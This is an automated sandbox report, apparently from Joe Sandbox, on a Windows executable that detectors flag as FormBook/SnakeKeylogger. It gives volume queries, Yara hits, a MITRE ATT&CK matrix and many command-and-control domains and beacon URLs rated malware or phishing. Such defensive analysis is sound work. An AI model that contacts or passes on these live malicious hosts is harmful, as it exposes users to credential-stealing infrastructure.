Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\z2______________________________.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4099606416.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1682100755.00000000038F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4099550212.0000000003180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4099606416.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1682100755.00000000038F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4099550212.0000000003180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Shared Modules	1 DLL Side-Loading	512 Process Injection	1 Rootkit	1 Credential API Hooking	121 Security Software Discovery	Remote Services	1 Credential API Hooking	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Masquerading	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Disable or Modify Tools	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	41 Virtualization/Sandbox Evasion	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	512 Process Injection	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
z2______________________________.exe	55%	ReversingLabs	ByteCode-MSIL.Trojan.SnakeKeylogger
z2______________________________.exe	63%	Virustotal		Browse
z2______________________________.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
www.theanhedonia.com	10%	Virustotal	Browse
www.batuoe.com	0%	Virustotal	Browse
www.smnyg.com	0%	Virustotal	Browse
venitro.com	12%	Virustotal	Browse
www.whatsapp1.autos	1%	Virustotal	Browse
www.naples.beauty	1%	Virustotal	Browse
www.tulisanemas.com	0%	Virustotal	Browse
www.zezfhys.com	0%	Virustotal	Browse
www.8x101n.xyz	0%	Virustotal	Browse
www.venitro.com	1%	Virustotal	Browse
www.mrbmed.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://schemas.micr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	0%	URL Reputation	safe
https://outlook.com_	0%	URL Reputation	safe
http://schemas.mi	0%	URL Reputation	safe
http://www.budgetnurseries.com/gy14/www.loscaseros.com	100%	Avira URL Cloud	malware
https://powerpoint.office.comcember	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
http://www.8x101n.xyz/gy14/www.mtdiyx.xyz	100%	Avira URL Cloud	phishing
http://www.mrbmed.com	0%	Avira URL Cloud	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.smnyg.com/gy14/?MRmX=e48KmGNPZ4HzO62J+BAEgJ7f72GC8C2SYwaKtCk56/rw6z0woMJSdTiOaB/ULaR4VT+G&J61h=CBZhCFnx-	100%	Avira URL Cloud	malware
http://www.naples.beauty/gy14/?MRmX=Go8vTrGGndHO0U55xCKSgIW+IdqdbLSyuJQv9ABJU2ERxA5ov3fqO1PElBTDnF66GZzA&J61h=CBZhCFnx-	100%	Avira URL Cloud	malware
http://www.zezfhys.com/gy14/www.batuoe.com	100%	Avira URL Cloud	malware
http://www.naples.beautyReferer:	0%	Avira URL Cloud	safe
http://www.mrbmed.com	0%	Virustotal		Browse
http://www.8x101n.xyz	0%	Avira URL Cloud	safe
http://www.8x101n.xyz/gy14/www.mtdiyx.xyz	4%	Virustotal		Browse
http://www.whatsapp1.autos	0%	Avira URL Cloud	safe
http://www.venitro.com	100%	Avira URL Cloud	malware
http://www.mtdiyx.xyz/gy14/www.whatsapp1.autos	100%	Avira URL Cloud	phishing
http://www.8x101n.xyz	0%	Virustotal		Browse
http://www.budgetnurseries.com	100%	Avira URL Cloud	malware
http://www.mtdiyx.xyz/gy14/	100%	Avira URL Cloud	phishing
http://www.truedatalab.com	100%	Avira URL Cloud	malware
http://www.mtdiyx.xyz/gy14/www.whatsapp1.autos	12%	Virustotal		Browse
http://www.budgetnurseries.com	0%	Virustotal		Browse
http://www.grow-services.net/api/grow/soap/#getPdfT	0%	Avira URL Cloud	safe
http://www.grow-services.net/api/grow/soap/#registerBabyT	0%	Avira URL Cloud	safe
http://www.grow-services.net/api/grow/soap/#getPdfT	0%	Virustotal		Browse
http://www.mrbmed.com/gy14/	100%	Avira URL Cloud	malware
http://www.founder.com.cn/cn/cThe	0%	Avira URL Cloud	safe
http://www.grow-services.net/api/grow/soap/#registerBabyT	0%	Virustotal		Browse
http://www.whatsapp1.autos	1%	Virustotal		Browse
http://www.truedatalab.com	0%	Virustotal		Browse
http://www.venitro.comReferer:	0%	Avira URL Cloud	safe
http://www.loscaseros.comReferer:	0%	Avira URL Cloud	safe
http://www.dianetion.com/gy14/www.budgetnurseries.com	100%	Avira URL Cloud	malware
http://www.mtdiyx.xyzReferer:	0%	Avira URL Cloud	safe
http://www.venitro.com	1%	Virustotal		Browse
http://www.mtdiyx.xyz/gy14/	1%	Virustotal		Browse
http://www.tulisanemas.com/gy14/www.zezfhys.com	100%	Avira URL Cloud	malware
http://www.grow-services.net/api/grow/soap/#clearDataT	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cn	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/cThe	0%	Virustotal		Browse
http://www.truedatalab.comReferer:	0%	Avira URL Cloud	safe
http://www.mrbmed.comReferer:	0%	Avira URL Cloud	safe
http://www.smnyg.comReferer:	0%	Avira URL Cloud	safe
http://www.mrbmed.com/gy14/	1%	Virustotal		Browse
http://www.grow-services.net/api/grow/soap/#clearDataT	0%	Virustotal		Browse
http://www.batuoe.com/gy14/	100%	Avira URL Cloud	malware
http://www.beautyloungebydede.online/gy14/www.truedatalab.com	100%	Avira URL Cloud	malware
http://www.tulisanemas.com/gy14/?MRmX=TVW95z+++zY0L5llmiI+edXNZ9WzZwQpiu6hZuLz+N2V81RbOedsJ4kc/YaR4gl/q+pE&J61h=CBZhCFnx-	100%	Avira URL Cloud	malware
http://www.zhongyicts.com.cn	1%	Virustotal		Browse
http://www.grow-services.net/api/grow/soap/#registerBirthT	0%	Avira URL Cloud	safe
http://www.grow-services.net/api/grow/soap/#removeMeasurementT	0%	Avira URL Cloud	safe
http://www.whatsapp1.autos/gy14/www.venitro.com	100%	Avira URL Cloud	malware
http://www.grow-services.net/api/grow/soap/#updateMeasurementT	0%	Avira URL Cloud	safe
http://www.tulisanemas.com/gy14/	100%	Avira URL Cloud	malware
http://www.grow-services.net/api/grow/soap/#removeMeasurementT	0%	Virustotal		Browse
http://www.theanhedonia.com/gy14/	100%	Avira URL Cloud	malware
http://www.zezfhys.comReferer:	0%	Avira URL Cloud	safe
http://www.whatsapp1.autos/gy14/www.venitro.com	10%	Virustotal		Browse
http://www.zezfhys.com	100%	Avira URL Cloud	malware
http://www.naples.beauty/gy14/www.8x101n.xyz	100%	Avira URL Cloud	malware
http://www.grow-services.net/api/grow/soap/#updateMeasurementT	0%	Virustotal		Browse
http://www.tulisanemas.com/gy14/	2%	Virustotal		Browse
http://www.mtdiyx.xyz	100%	Avira URL Cloud	malware
http://www.truedatalab.com/gy14/www.dianetion.com	100%	Avira URL Cloud	malware
http://www.venitro.com/gy14/	100%	Avira URL Cloud	malware
http://www.theanhedonia.com/gy14/	2%	Virustotal		Browse
http://www.mtdiyx.xyz	0%	Virustotal		Browse
http://www.8x101n.xyz/gy14/	100%	Avira URL Cloud	phishing
http://www.smnyg.com/gy14/	1%	Virustotal		Browse
http://www.8x101n.xyz/gy14/	2%	Virustotal		Browse
http://www.zezfhys.com	0%	Virustotal		Browse
http://www.venitro.com/gy14/	11%	Virustotal		Browse
http://www.smnyg.com/gy14/	100%	Avira URL Cloud	malware
http://www.dianetion.comReferer:	0%	Avira URL Cloud	safe
http://www.theanhedonia.com/gy14/?MRmX=sJB9xXC4L0bq2ox6VvMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs633JlGPbuQ58&J61h=CBZhCFnx-	100%	Avira URL Cloud	malware
http://www.batuoe.comReferer:	0%	Avira URL Cloud	safe
http://www.naples.beauty/gy14/	100%	Avira URL Cloud	malware
http://www.founder.com.cn/cn/bThe	0%	Avira URL Cloud	safe
http://www.venitro.com/gy14/www.tulisanemas.com	100%	Avira URL Cloud	malware
http://www.grow-services.net/api/grow/soap/#addMeasurementT	0%	Avira URL Cloud	safe
http://www.theanhedonia.com/gy14/www.beautyloungebydede.online	100%	Avira URL Cloud	malware
http://www.founder.com.cn/cn/bThe	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
parkingpage.namecheap.com	91.195.240.19	true	false		high
www.theanhedonia.com	103.224.212.212	true	true	10%, Virustotal, Browse	unknown
www.batuoe.com	104.21.9.22	true	true	0%, Virustotal, Browse	unknown
www.smnyg.com	154.86.173.213	true	true	0%, Virustotal, Browse	unknown
venitro.com	3.33.130.190	true	true	12%, Virustotal, Browse	unknown
www.whatsapp1.autos	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.zezfhys.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.naples.beauty	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.8x101n.xyz	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.tulisanemas.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.venitro.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.mrbmed.com	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.naples.beauty/gy14/?MRmX=Go8vTrGGndHO0U55xCKSgIW+IdqdbLSyuJQv9ABJU2ERxA5ov3fqO1PElBTDnF66GZzA&J61h=CBZhCFnx-	true	Avira URL Cloud: malware	unknown
http://www.smnyg.com/gy14/?MRmX=e48KmGNPZ4HzO62J+BAEgJ7f72GC8C2SYwaKtCk56/rw6z0woMJSdTiOaB/ULaR4VT+G&J61h=CBZhCFnx-	true	Avira URL Cloud: malware	unknown
http://www.tulisanemas.com/gy14/?MRmX=TVW95z+++zY0L5llmiI+edXNZ9WzZwQpiu6hZuLz+N2V81RbOedsJ4kc/YaR4gl/q+pE&J61h=CBZhCFnx-	true	Avira URL Cloud: malware	unknown
http://www.theanhedonia.com/gy14/?MRmX=sJB9xXC4L0bq2ox6VvMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs633JlGPbuQ58&J61h=CBZhCFnx-	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/odirmr	explorer.exe, 00000006.00000000.1667913063.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4101465452.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.budgetnurseries.com/gy14/www.loscaseros.com	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.mrbmed.com	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.8x101n.xyz/gy14/www.mtdiyx.xyz	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	true	4%, Virustotal, Browse Avira URL Cloud: phishing	unknown
